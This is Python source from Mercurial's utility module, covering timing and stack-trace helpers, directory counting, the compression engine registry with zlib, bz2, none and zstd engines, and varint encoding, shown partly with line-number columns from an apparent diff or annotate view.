    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3430
3438
# current report indentation: two spaces per nested @timed call
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        step = 2
        begin = timer()
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            duration = timer() - begin
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(duration)))
    return wrapper
3457
3465
# (suffix, multiplier) pairs; the bare 'b' must stay last so 'kb'/'mb'/'gb'
# are tried before it
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3479
3487
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, callable) pairs
        self._hooks = []

    def add(self, source, hook):
        # register hook under source; source determines call order
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # invoke every hook in lexicographic order of source names and
        # collect their return values
        self._hooks.sort(key=lambda entry: entry[0])
        return [fn(*args) for _source, fn in self._hooks]
3497
3505
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries
    (depth=0 keeps them all).
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    frames = traceback.extract_stack()[:-skip - 1]
    entries = [(fileline % (pycompat.sysbytes(fn), ln),
                pycompat.sysbytes(func))
               for fn, ln, func, _text in frames][-depth:]
    if not entries:
        return
    fnmax = max(len(entry[0]) for entry in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3520
3528
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # flush the other stream first so the two outputs interleave sanely
        otherf.flush()
    write = f.write
    write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this helper's own frame from the report
    for frameline in getstackframes(skip + 1, depth=depth):
        write(frameline)
    f.flush()
3535
3543
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style map: entries whose state equals skip are
            # left out of the count
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        counts = self._dirs
        for ancestor in finddirs(path):
            if ancestor in counts:
                # this ancestor (and therefore every shallower one) is
                # already accounted for
                counts[ancestor] += 1
                return
            counts[ancestor] = 1

    def delpath(self, path):
        counts = self._dirs
        for ancestor in finddirs(path):
            if counts[ancestor] > 1:
                # still referenced by other paths; shallower ancestors
                # keep their counts too
                counts[ancestor] -= 1
                return
            del counts[ancestor]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3571
3579
# Prefer the C implementation of dirs from the parsers module when the
# loaded parsers provide one; the pure-Python class above is the fallback.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3574
3582
def finddirs(path):
    '''Yield every ancestor directory of ``path``, nearest first.

    ``'/'`` is the separator; the path itself is not yielded. For
    example, ``finddirs('a/b/c')`` yields ``'a/b'`` then ``'a'``.
    '''
    sep = path.rfind('/')
    while sep != -1:
        yield path[:sep]
        sep = path.rfind('/', 0, sep)
3580
3588
# compression code

# Roles used when querying an engine's wire protocol compression support.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support: its format identifier plus
# an advertisement priority for each role.
compewireprotosupport = collections.namedtuple(
    u'compenginewireprotosupport',
    (u'name', u'serverpriority', u'clientpriority'))
3589
3597
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ``error.Abort`` if any identifier the engine declares (its
        name, bundle name/type, wire protocol type, or revlog header) is
        already registered by another engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # A false bundlename means the engine declared no external
            # facing name, so it isn't exposed in the bundle spec namespace.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        # sorted() already returns a list; wrapping it in list() was
        # redundant.
        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
3745
3753
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        # Engines are assumed usable unless a subclass overrides this.
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader`.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        # None means "bundles not supported by this engine".
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        # None means "wire protocol compression not supported".
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3862
3870
class _zlibengine(compressionengine):
    # zlib/DEFLATE compression via the stdlib zlib module; supports bundles,
    # the wire protocol, and revlogs.
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        # Equal priority (20) for both server and client roles.
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        # 'x' (0x78) is the leading byte of a default zlib stream, so raw
        # zlib output doubles as its own revlog header.
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        # 'level' defaults to -1 (zlib's own default compression level).
        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                # A single input chunk may decompress to far more output;
                # drain it in bounded pieces via unconsumed_tail.
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Below this size, compression is presumably not worth it —
            # TODO confirm the origin of the 44-byte threshold.
            if insize < 44:
                return None

            elif insize <= 1000000:
                # One-shot compression for small-to-medium inputs; only
                # keep the result if it actually shrank the data.
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                # Feed the input in 1 MiB slices to bound peak memory.
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                # Compression didn't help; signal "store uncompressed".
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                # Surface corruption as a RevlogError so callers can treat
                # it as revlog data corruption rather than a zlib bug.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        # Stateless: a fresh compressor per call; opts are ignored here.
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3949
3957
class _bz2engine(compressionengine):
    # bzip2 compression via the stdlib bz2 module; bundle support plus a
    # declared-but-unadvertised wire protocol entry.
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        # Priority 0 for both roles: registered, never advertised.
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # 'level' defaults to 9, bz2's maximum compression.
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer internally; only yield when it emits.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3992
4000
class _truncatedbz2engine(compressionengine):
    # Variant of bz2 for streams whose leading 'BZ' magic was stripped.
    # Decompression-only: it exists solely for the internal '_truncatedBZ'
    # bundle identifier.
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # First element None: no external-facing bundle spec name.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
4013
4021
class _noopengine(compressionengine):
    # Pass-through engine: no compression or decompression is performed.
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        # Server priority 0 (never advertised), client priority 10.
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity: hand the caller's iterator back untouched.
        return it

    def decompressorreader(self, fh):
        # Identity: the file object already yields raw data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None tells the revlog layer the data was not compressed.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
4048
4056
4049 class _zstdengine(compressionengine):
4057 class _zstdengine(compressionengine):
4050 def name(self):
4058 def name(self):
4051 return 'zstd'
4059 return 'zstd'
4052
4060
4053 @propertycache
4061 @propertycache
4054 def _module(self):
4062 def _module(self):
4055 # Not all installs have the zstd module available. So defer importing
4063 # Not all installs have the zstd module available. So defer importing
4056 # until first access.
4064 # until first access.
4057 try:
4065 try:
4058 from . import zstd
4066 from . import zstd
4059 # Force delayed import.
4067 # Force delayed import.
4060 zstd.__version__
4068 zstd.__version__
4061 return zstd
4069 return zstd
4062 except ImportError:
4070 except ImportError:
4063 return None
4071 return None
4064
4072
4065 def available(self):
4073 def available(self):
4066 return bool(self._module)
4074 return bool(self._module)
4067
4075
4068 def bundletype(self):
4076 def bundletype(self):
4069 """A modern compression algorithm that is fast and highly flexible.
4077 """A modern compression algorithm that is fast and highly flexible.
4070
4078
4071 Only supported by Mercurial 4.1 and newer clients.
4079 Only supported by Mercurial 4.1 and newer clients.
4072
4080
4073 With the default settings, zstd compression is both faster and yields
4081 With the default settings, zstd compression is both faster and yields
4074 better compression than ``gzip``. It also frequently yields better
4082 better compression than ``gzip``. It also frequently yields better
4075 compression than ``bzip2`` while operating at much higher speeds.
4083 compression than ``bzip2`` while operating at much higher speeds.
4076
4084
4077 If this engine is available and backwards compatibility is not a
4085 If this engine is available and backwards compatibility is not a
4078 concern, it is likely the best available engine.
4086 concern, it is likely the best available engine.
4079 """
4087 """
4080 return 'zstd', 'ZS'
4088 return 'zstd', 'ZS'
4081
4089
4082 def wireprotosupport(self):
4090 def wireprotosupport(self):
4083 return compewireprotosupport('zstd', 50, 50)
4091 return compewireprotosupport('zstd', 50, 50)
4084
4092
4085 def revlogheader(self):
4093 def revlogheader(self):
4086 return '\x28'
4094 return '\x28'
4087
4095
4088 def compressstream(self, it, opts=None):
4096 def compressstream(self, it, opts=None):
4089 opts = opts or {}
4097 opts = opts or {}
4090 # zstd level 3 is almost always significantly faster than zlib
4098 # zstd level 3 is almost always significantly faster than zlib
4091 # while providing no worse compression. It strikes a good balance
4099 # while providing no worse compression. It strikes a good balance
4092 # between speed and compression.
4100 # between speed and compression.
4093 level = opts.get('level', 3)
4101 level = opts.get('level', 3)
4094
4102
4095 zstd = self._module
4103 zstd = self._module
4096 z = zstd.ZstdCompressor(level=level).compressobj()
4104 z = zstd.ZstdCompressor(level=level).compressobj()
4097 for chunk in it:
4105 for chunk in it:
4098 data = z.compress(chunk)
4106 data = z.compress(chunk)
4099 if data:
4107 if data:
4100 yield data
4108 yield data
4101
4109
4102 yield z.flush()
4110 yield z.flush()
4103
4111
4104 def decompressorreader(self, fh):
4112 def decompressorreader(self, fh):
4105 zstd = self._module
4113 zstd = self._module
4106 dctx = zstd.ZstdDecompressor()
4114 dctx = zstd.ZstdDecompressor()
4107 return chunkbuffer(dctx.read_from(fh))
4115 return chunkbuffer(dctx.read_from(fh))
4108
4116
4109 class zstdrevlogcompressor(object):
4117 class zstdrevlogcompressor(object):
4110 def __init__(self, zstd, level=3):
4118 def __init__(self, zstd, level=3):
4111 # Writing the content size adds a few bytes to the output. However,
4119 # Writing the content size adds a few bytes to the output. However,
4112 # it allows decompression to be more optimal since we can
4120 # it allows decompression to be more optimal since we can
4113 # pre-allocate a buffer to hold the result.
4121 # pre-allocate a buffer to hold the result.
4114 self._cctx = zstd.ZstdCompressor(level=level,
4122 self._cctx = zstd.ZstdCompressor(level=level,
4115 write_content_size=True)
4123 write_content_size=True)
4116 self._dctx = zstd.ZstdDecompressor()
4124 self._dctx = zstd.ZstdDecompressor()
4117 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4125 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4118 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4126 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4119
4127
4120 def compress(self, data):
4128 def compress(self, data):
4121 insize = len(data)
4129 insize = len(data)
4122 # Caller handles empty input case.
4130 # Caller handles empty input case.
4123 assert insize > 0
4131 assert insize > 0
4124
4132
4125 if insize < 50:
4133 if insize < 50:
4126 return None
4134 return None
4127
4135
4128 elif insize <= 1000000:
4136 elif insize <= 1000000:
4129 compressed = self._cctx.compress(data)
4137 compressed = self._cctx.compress(data)
4130 if len(compressed) < insize:
4138 if len(compressed) < insize:
4131 return compressed
4139 return compressed
4132 return None
4140 return None
4133 else:
4141 else:
4134 z = self._cctx.compressobj()
4142 z = self._cctx.compressobj()
4135 chunks = []
4143 chunks = []
4136 pos = 0
4144 pos = 0
4137 while pos < insize:
4145 while pos < insize:
4138 pos2 = pos + self._compinsize
4146 pos2 = pos + self._compinsize
4139 chunk = z.compress(data[pos:pos2])
4147 chunk = z.compress(data[pos:pos2])
4140 if chunk:
4148 if chunk:
4141 chunks.append(chunk)
4149 chunks.append(chunk)
4142 pos = pos2
4150 pos = pos2
4143 chunks.append(z.flush())
4151 chunks.append(z.flush())
4144
4152
4145 if sum(map(len, chunks)) < insize:
4153 if sum(map(len, chunks)) < insize:
4146 return ''.join(chunks)
4154 return ''.join(chunks)
4147 return None
4155 return None
4148
4156
4149 def decompress(self, data):
4157 def decompress(self, data):
4150 insize = len(data)
4158 insize = len(data)
4151
4159
4152 try:
4160 try:
4153 # This was measured to be faster than other streaming
4161 # This was measured to be faster than other streaming
4154 # decompressors.
4162 # decompressors.
4155 dobj = self._dctx.decompressobj()
4163 dobj = self._dctx.decompressobj()
4156 chunks = []
4164 chunks = []
4157 pos = 0
4165 pos = 0
4158 while pos < insize:
4166 while pos < insize:
4159 pos2 = pos + self._decompinsize
4167 pos2 = pos + self._decompinsize
4160 chunk = dobj.decompress(data[pos:pos2])
4168 chunk = dobj.decompress(data[pos:pos2])
4161 if chunk:
4169 if chunk:
4162 chunks.append(chunk)
4170 chunks.append(chunk)
4163 pos = pos2
4171 pos = pos2
4164 # Frame should be exhausted, so no finish() API.
4172 # Frame should be exhausted, so no finish() API.
4165
4173
4166 return ''.join(chunks)
4174 return ''.join(chunks)
4167 except Exception as e:
4175 except Exception as e:
4168 raise error.RevlogError(_('revlog decompress error: %s') %
4176 raise error.RevlogError(_('revlog decompress error: %s') %
4169 forcebytestr(e))
4177 forcebytestr(e))
4170
4178
4171 def revlogcompressor(self, opts=None):
4179 def revlogcompressor(self, opts=None):
4172 opts = opts or {}
4180 opts = opts or {}
4173 return self.zstdrevlogcompressor(self._module,
4181 return self.zstdrevlogcompressor(self._module,
4174 level=opts.get('level', 3))
4182 level=opts.get('level', 3))
4175
4183
4176 compengines.register(_zstdengine())
4184 compengines.register(_zstdengine())
4177
4185
4178 def bundlecompressiontopics():
4186 def bundlecompressiontopics():
4179 """Obtains a list of available bundle compressions for use in help."""
4187 """Obtains a list of available bundle compressions for use in help."""
4180 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4188 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4181 items = {}
4189 items = {}
4182
4190
4183 # We need to format the docstring. So use a dummy object/type to hold it
4191 # We need to format the docstring. So use a dummy object/type to hold it
4184 # rather than mutating the original.
4192 # rather than mutating the original.
4185 class docobject(object):
4193 class docobject(object):
4186 pass
4194 pass
4187
4195
4188 for name in compengines:
4196 for name in compengines:
4189 engine = compengines[name]
4197 engine = compengines[name]
4190
4198
4191 if not engine.available():
4199 if not engine.available():
4192 continue
4200 continue
4193
4201
4194 bt = engine.bundletype()
4202 bt = engine.bundletype()
4195 if not bt or not bt[0]:
4203 if not bt or not bt[0]:
4196 continue
4204 continue
4197
4205
4198 doc = pycompat.sysstr('``%s``\n %s') % (
4206 doc = pycompat.sysstr('``%s``\n %s') % (
4199 bt[0], engine.bundletype.__doc__)
4207 bt[0], engine.bundletype.__doc__)
4200
4208
4201 value = docobject()
4209 value = docobject()
4202 value.__doc__ = doc
4210 value.__doc__ = doc
4203 value._origdoc = engine.bundletype.__doc__
4211 value._origdoc = engine.bundletype.__doc__
4204 value._origfunc = engine.bundletype
4212 value._origfunc = engine.bundletype
4205
4213
4206 items[bt[0]] = value
4214 items[bt[0]] = value
4207
4215
4208 return items
4216 return items
4209
4217
4210 i18nfunctions = bundlecompressiontopics().values()
4218 i18nfunctions = bundlecompressiontopics().values()
4211
4219
4212 # convenient shortcut
4220 # convenient shortcut
4213 dst = debugstacktrace
4221 dst = debugstacktrace
4214
4222
4215 def safename(f, tag, ctx, others=None):
4223 def safename(f, tag, ctx, others=None):
4216 """
4224 """
4217 Generate a name that it is safe to rename f to in the given context.
4225 Generate a name that it is safe to rename f to in the given context.
4218
4226
4219 f: filename to rename
4227 f: filename to rename
4220 tag: a string tag that will be included in the new name
4228 tag: a string tag that will be included in the new name
4221 ctx: a context, in which the new name must not exist
4229 ctx: a context, in which the new name must not exist
4222 others: a set of other filenames that the new name must not be in
4230 others: a set of other filenames that the new name must not be in
4223
4231
4224 Returns a file name of the form oldname~tag[~number] which does not exist
4232 Returns a file name of the form oldname~tag[~number] which does not exist
4225 in the provided context and is not in the set of other names.
4233 in the provided context and is not in the set of other names.
4226 """
4234 """
4227 if others is None:
4235 if others is None:
4228 others = set()
4236 others = set()
4229
4237
4230 fn = '%s~%s' % (f, tag)
4238 fn = '%s~%s' % (f, tag)
4231 if fn not in ctx and fn not in others:
4239 if fn not in ctx and fn not in others:
4232 return fn
4240 return fn
4233 for n in itertools.count(1):
4241 for n in itertools.count(1):
4234 fn = '%s~%s~%s' % (f, tag, n)
4242 fn = '%s~%s~%s' % (f, tag, n)
4235 if fn not in ctx and fn not in others:
4243 if fn not in ctx and fn not in others:
4236 return fn
4244 return fn
4237
4245
4238 def readexactly(stream, n):
4246 def readexactly(stream, n):
4239 '''read n bytes from stream.read and abort if less was available'''
4247 '''read n bytes from stream.read and abort if less was available'''
4240 s = stream.read(n)
4248 s = stream.read(n)
4241 if len(s) < n:
4249 if len(s) < n:
4242 raise error.Abort(_("stream ended unexpectedly"
4250 raise error.Abort(_("stream ended unexpectedly"
4243 " (got %d bytes, expected %d)")
4251 " (got %d bytes, expected %d)")
4244 % (len(s), n))
4252 % (len(s), n))
4245 return s
4253 return s
4246
4254
4247 def uvarintencode(value):
4255 def uvarintencode(value):
4248 """Encode an unsigned integer value to a varint.
4256 """Encode an unsigned integer value to a varint.
4249
4257
4250 A varint is a variable length integer of 1 or more bytes. Each byte
4258 A varint is a variable length integer of 1 or more bytes. Each byte
4251 except the last has the most significant bit set. The lower 7 bits of
4259 except the last has the most significant bit set. The lower 7 bits of
4252 each byte store the 2's complement representation, least significant group
4260 each byte store the 2's complement representation, least significant group
4253 first.
4261 first.
4254
4262
4255 >>> uvarintencode(0)
4263 >>> uvarintencode(0)
4256 '\\x00'
4264 '\\x00'
4257 >>> uvarintencode(1)
4265 >>> uvarintencode(1)
4258 '\\x01'
4266 '\\x01'
4259 >>> uvarintencode(127)
4267 >>> uvarintencode(127)
4260 '\\x7f'
4268 '\\x7f'
4261 >>> uvarintencode(1337)
4269 >>> uvarintencode(1337)
4262 '\\xb9\\n'
4270 '\\xb9\\n'
4263 >>> uvarintencode(65536)
4271 >>> uvarintencode(65536)
4264 '\\x80\\x80\\x04'
4272 '\\x80\\x80\\x04'
4265 >>> uvarintencode(-1)
4273 >>> uvarintencode(-1)
4266 Traceback (most recent call last):
4274 Traceback (most recent call last):
4267 ...
4275 ...
4268 ProgrammingError: negative value for uvarint: -1
4276 ProgrammingError: negative value for uvarint: -1
4269 """
4277 """
4270 if value < 0:
4278 if value < 0:
4271 raise error.ProgrammingError('negative value for uvarint: %d'
4279 raise error.ProgrammingError('negative value for uvarint: %d'
4272 % value)
4280 % value)
4273 bits = value & 0x7f
4281 bits = value & 0x7f
4274 value >>= 7
4282 value >>= 7
4275 bytes = []
4283 bytes = []
4276 while value:
4284 while value:
4277 bytes.append(pycompat.bytechr(0x80 | bits))
4285 bytes.append(pycompat.bytechr(0x80 | bits))
4278 bits = value & 0x7f
4286 bits = value & 0x7f
4279 value >>= 7
4287 value >>= 7
4280 bytes.append(pycompat.bytechr(bits))
4288 bytes.append(pycompat.bytechr(bits))
4281
4289
4282 return ''.join(bytes)
4290 return ''.join(bytes)
4283
4291
4284 def uvarintdecodestream(fh):
4292 def uvarintdecodestream(fh):
4285 """Decode an unsigned variable length integer from a stream.
4293 """Decode an unsigned variable length integer from a stream.
4286
4294
4287 The passed argument is anything that has a ``.read(N)`` method.
4295 The passed argument is anything that has a ``.read(N)`` method.
4288
4296
4289 >>> try:
4297 >>> try:
4290 ... from StringIO import StringIO as BytesIO
4298 ... from StringIO import StringIO as BytesIO
4291 ... except ImportError:
4299 ... except ImportError:
4292 ... from io import BytesIO
4300 ... from io import BytesIO
4293 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4294 0
4302 0
4295 >>> uvarintdecodestream(BytesIO(b'\\x01'))
